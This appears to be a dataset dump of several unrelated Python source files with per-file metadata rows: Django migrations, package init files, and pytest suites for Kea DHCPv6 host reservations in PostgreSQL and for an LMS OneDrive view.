| 40.487952 | 214 | 0.515771 | 2,851 | 26,884 | 4.716941 | 0.108734 | 0.016731 | 0.030116 | 0.019334 | 0.885039 | 0.874108 | 0.865705 | 0.859161 | 0.853064 | 0.847412 | 0 | 0.011461 | 0.360661 | 26,884 | 663 | 215 | 40.54902 | 0.770945 | 0.039577 | 0 | 0.856823 | 0 | 0 | 0.155172 | 0 | 0 | 0 | 0.00063 | 0 | 0.004474 | 1 | 0.038031 | false | 0 | 0.017897 | 0 | 0.10962 | 0.073826 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0e606d90ba09c07c9771fa24b480c3de932c409 | 174 | py | Python | yfantasy_api/models/__init__.py | frugardc/yfantasy-api | 9736a0680460ee99411ef040a130e505fe4d229b | [
"MIT"
] | 3 | 2021-03-13T02:15:21.000Z | 2021-07-07T02:20:50.000Z | yfantasy_api/models/__init__.py | frugardc/yfantasy-api | 9736a0680460ee99411ef040a130e505fe4d229b | [
"MIT"
] | 5 | 2021-04-10T04:58:47.000Z | 2021-11-01T13:55:45.000Z | yfantasy_api/models/__init__.py | frugardc/yfantasy-api | 9736a0680460ee99411ef040a130e505fe4d229b | [
"MIT"
] | 1 | 2021-09-13T12:02:17.000Z | 2021-09-13T12:02:17.000Z | from yfantasy_api.models.game import Game
from yfantasy_api.models.league import League
from yfantasy_api.models.common import Team
from yfantasy_api.models.user import User
| 34.8 | 45 | 0.862069 | 28 | 174 | 5.214286 | 0.357143 | 0.328767 | 0.410959 | 0.575342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091954 | 174 | 4 | 46 | 43.5 | 0.924051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e0ef3f6fbd746d97265f8675c7253441ace8b3ef | 5,151 | py | Python | app/core/migrations/0003_auto_20200101_2311.py | Raysultan/roscosmos-stats | 8931ee824c4e4cd67ae4f86ce221515b00d9e872 | [
"MIT"
] | 5 | 2020-11-24T09:57:36.000Z | 2021-11-17T08:02:29.000Z | app/core/migrations/0003_auto_20200101_2311.py | raisultan/roscosmos-api | 8931ee824c4e4cd67ae4f86ce221515b00d9e872 | [
"MIT"
] | null | null | null | app/core/migrations/0003_auto_20200101_2311.py | raisultan/roscosmos-api | 8931ee824c4e4cd67ae4f86ce221515b00d9e872 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.1 on 2020-01-01 23:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_launchpad_establishment_date'),
]
operations = [
migrations.AlterField(
model_name='launch',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='no_employees',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='use_period',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='launchpad',
name='used_by',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='launchvehicle',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='launchvehicle',
name='max_distance',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='accuracy',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='coverage',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='first_launch_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_planes',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_spacecrafts',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='no_spacecrafts_on_plane',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbit_height',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbital_inclination',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='orbitalgrouping',
name='orbital_period',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='accuracy',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='coverage_diameter',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='manufacturer',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='orbital_inclination',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacecraft',
name='orbital_period',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='autonomous_flight_time',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='description',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='first_launch_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='spacetug',
name='no_flights',
field=models.IntegerField(blank=True, null=True),
),
]
| 34.57047 | 74 | 0.567463 | 471 | 5,151 | 6.065817 | 0.144374 | 0.189009 | 0.236262 | 0.274064 | 0.890795 | 0.890795 | 0.890795 | 0.876794 | 0.854743 | 0.851243 | 0 | 0.014217 | 0.31722 | 5,151 | 148 | 75 | 34.804054 | 0.798123 | 0.008736 | 0 | 0.852113 | 1 | 0 | 0.13656 | 0.015282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007042 | 0 | 0.028169 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e0f6f0e8aae5515debb0f1a44b220c3ed37d18de | 12,926 | py | Python | tests/dhcpv6/kea_only/host_reservation/test_host_reservation_pgsql.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | tests/dhcpv6/kea_only/host_reservation/test_host_reservation_pgsql.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | tests/dhcpv6/kea_only/host_reservation/test_host_reservation_pgsql.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | """Host Reservation DHCPv6 stored in PostgreSQL database."""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_all_values_mac():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', '1')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_prefix_db_backend_reservation('3001::', '40', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::101', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.option_db_record_reservation('32',
'10',
'dhcp6',
'1',
'$(EMPTY)',
'1',
'subnet',
'PostgreSQL',
'1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', 'true')
srv_control.add_ddns_server_options('qualifying-suffix', 'my.domain.com')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'some-different-name')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', None, 'fqdn')
srv_msg.client_requests_option('32')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
srv_msg.response_check_suboption_content('Response', '26', '25', None, 'prefix', '3001::')
srv_msg.response_check_include_option('Response', None, '39')
srv_msg.response_check_option_content('Response',
'39',
None,
'fqdn',
'reserved-hostname.my.domain.com.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '777')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'some-different-name')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', None, 'fqdn')
srv_msg.client_requests_option('32')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_duid_ll_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'duid', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_not_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_matching():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:01')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
@pytest.mark.v6
@pytest.mark.host_reservation
@pytest.mark.kea_only
@pytest.mark.pgsql
def test_v6_host_reservation_pgsql_hwaddrr_matching_dual_backend():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'hw-address', 'f6:f5:f4:f3:f2:11')
srv_control.update_db_backend_reservation('dhcp6_subnet_id', '1', 'PostgreSQL', '1')
srv_control.ipv6_address_db_backend_reservation('3000::100', '$(EMPTY)', 'PostgreSQL', '1')
srv_control.upload_db_reservation('PostgreSQL')
srv_control.host_reservation_in_subnet('address',
'3000::fff',
'0',
'hw-address',
'f6:f5:f4:f3:f2:22')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:01:00:01:52:7b:a8:f0:f6:f5:f4:f3:f2:11')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::100')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::fff')
| 47.874074 | 97 | 0.68544 | 1,813 | 12,926 | 4.530061 | 0.079426 | 0.078899 | 0.087666 | 0.083283 | 0.944113 | 0.939364 | 0.932059 | 0.914039 | 0.903324 | 0.903324 | 0 | 0.05104 | 0.155733 | 12,926 | 269 | 98 | 48.052045 | 0.701549 | 0.007582 | 0 | 0.806167 | 0 | 0.013216 | 0.223678 | 0.032444 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022026 | true | 0.048458 | 0.017621 | 0 | 0.039648 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1ce3b643b4faf8ac0410456c20401620b02ae638 | 145 | py | Python | py_crypto_hd_wallet/common/__init__.py | 3rdIteration/py_crypto_hd_wallet | c5edd62df9e95d93088948c647c9de53a063d78e | [
"MIT"
] | 35 | 2020-05-15T08:11:49.000Z | 2022-03-29T00:44:05.000Z | py_crypto_hd_wallet/common/__init__.py | 3rdIteration/py_crypto_hd_wallet | c5edd62df9e95d93088948c647c9de53a063d78e | [
"MIT"
] | 17 | 2020-07-25T11:37:23.000Z | 2022-03-30T17:52:49.000Z | py_crypto_hd_wallet/common/__init__.py | 3rdIteration/py_crypto_hd_wallet | c5edd62df9e95d93088948c647c9de53a063d78e | [
"MIT"
] | 18 | 2020-05-15T08:11:52.000Z | 2022-03-24T06:24:03.000Z | from py_crypto_hd_wallet.common.hd_wallet_base import HdWalletBase
from py_crypto_hd_wallet.common.hd_wallet_data_types import HdWalletDataTypes
| 48.333333 | 77 | 0.917241 | 23 | 145 | 5.304348 | 0.521739 | 0.262295 | 0.196721 | 0.229508 | 0.557377 | 0.557377 | 0.557377 | 0.557377 | 0 | 0 | 0 | 0 | 0.055172 | 145 | 2 | 78 | 72.5 | 0.890511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1cf3305bda381c34d27c076163f2f329cff09a09 | 131 | py | Python | tests/unit/lms/views/onedrive_test.py | hypothesis/lms | 722dac444dc1e73298eea5193f871f3ddefe46fd | [
"BSD-2-Clause"
] | 38 | 2017-12-30T23:49:53.000Z | 2022-02-15T21:07:49.000Z | tests/unit/lms/views/onedrive_test.py | hypothesis/lms | 722dac444dc1e73298eea5193f871f3ddefe46fd | [
"BSD-2-Clause"
] | 1,733 | 2017-11-09T18:46:05.000Z | 2022-03-31T11:05:50.000Z | tests/unit/lms/views/onedrive_test.py | hypothesis/lms | 722dac444dc1e73298eea5193f871f3ddefe46fd | [
"BSD-2-Clause"
] | 10 | 2018-07-11T17:12:46.000Z | 2022-01-07T20:00:23.000Z | from lms.views.onedrive import redirect_uri
def test_redirect_uri(pyramid_request):
assert not redirect_uri(pyramid_request)
| 21.833333 | 44 | 0.832061 | 19 | 131 | 5.421053 | 0.684211 | 0.320388 | 0.349515 | 0.485437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114504 | 131 | 5 | 45 | 26.2 | 0.887931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e8081cf7480affab70e7916d7ec5efe205596985 | 7,734 | py | Python | resume_app/migrations/0004_auto__del_field_resume_skill_string.py | joshcai/resumatch | c27550f96c260499a7e90db578e5f1f8d4404983 | [
"MIT"
] | null | null | null | resume_app/migrations/0004_auto__del_field_resume_skill_string.py | joshcai/resumatch | c27550f96c260499a7e90db578e5f1f8d4404983 | [
"MIT"
] | null | null | null | resume_app/migrations/0004_auto__del_field_resume_skill_string.py | joshcai/resumatch | c27550f96c260499a7e90db578e5f1f8d4404983 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Resume.skill_string'
db.delete_column(u'resume_app_resume', 'skill_string')
def backwards(self, orm):
# Adding field 'Resume.skill_string'
db.add_column(u'resume_app_resume', 'skill_string',
self.gf('django.db.models.fields.TextField')(default=''),
keep_default=False)
models = {
u'resume_app.additional': {
'Meta': {'object_name': 'Additional'},
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.additional_section': {
'Meta': {'object_name': 'Additional_Section'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'sections': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Additional']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.comment': {
'Meta': {'object_name': 'Comment'},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resume': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.Resume']"}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.edu': {
'Meta': {'object_name': 'Edu'},
'degree': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
'finish': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'gpa': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'university': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.exp': {
'Meta': {'object_name': 'Exp'},
'company': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
'finish': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'start': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.honor': {
'Meta': {'object_name': 'Honor'},
'date': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.info': {
'Meta': {'object_name': 'Info'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.job': {
'Meta': {'object_name': 'Job'},
'description': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '120'})
},
u'resume_app.resume': {
'Meta': {'object_name': 'Resume'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'resume': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'upvotes': ('django.db.models.fields.IntegerField', [], {}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.skill': {
'Meta': {'object_name': 'Skill'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'skill_set': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.Skill_Set']"})
},
u'resume_app.skill_set': {
'Meta': {'object_name': 'Skill_Set'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.user': {
'Meta': {'object_name': 'User'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '120'})
}
}
